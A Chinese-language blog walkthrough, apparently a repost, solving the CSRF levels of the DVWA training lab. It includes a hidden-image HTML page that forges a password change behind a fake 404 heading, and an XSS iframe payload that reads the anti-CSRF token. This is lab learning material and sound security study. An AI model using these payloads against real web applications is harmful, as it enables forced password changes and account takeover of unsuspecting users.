DVWA 通关CSRF

CSRF 跨站请求伪造

跨站请求伪造(Cross Site Request ForgeryCSRF).

CSRF是一种攻击,它强制终端用户在当前对其进行身份验证后的Web应用程序上执行非本意操作的攻击。

CSRF攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求响应。

借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击选择的操作,修改密码等操作,如果受害者是普通用户,则成功的CSRF攻击可以强制用户更改状态请求,例如转移资产、修改密码等操作。如果受害者是管理账户,CSRF攻击会危及整个Web应用程序。

Low

复制URL更改密码字段再次访问可以直接更改密码。

Medium

看源码可知服务器验证了HEEP中Referer字段  可以制作一个HTML页面img标签请求访问服务器,并把这个文件路径修改与referer字段相匹配。


<html>
<head>
</head>
<body>
<img src="http://10.3.139.77/DVWA-master/DVWA-master/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#" border="8" style="display:none;"/>
<h1>404 Not Find</h1>
</body>
</html>

high

高难度添加了token验证

只能通过XSS获取token值  然后将token值放置在URL连接后,进行跨站伪造,高难度需要存储型XSS和CSRF结合。

XSS构造语句

<iframe src="../csrf/" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)></iframe>

猜你喜欢

转载自blog.csdn.net/qq_42094992/article/details/107771276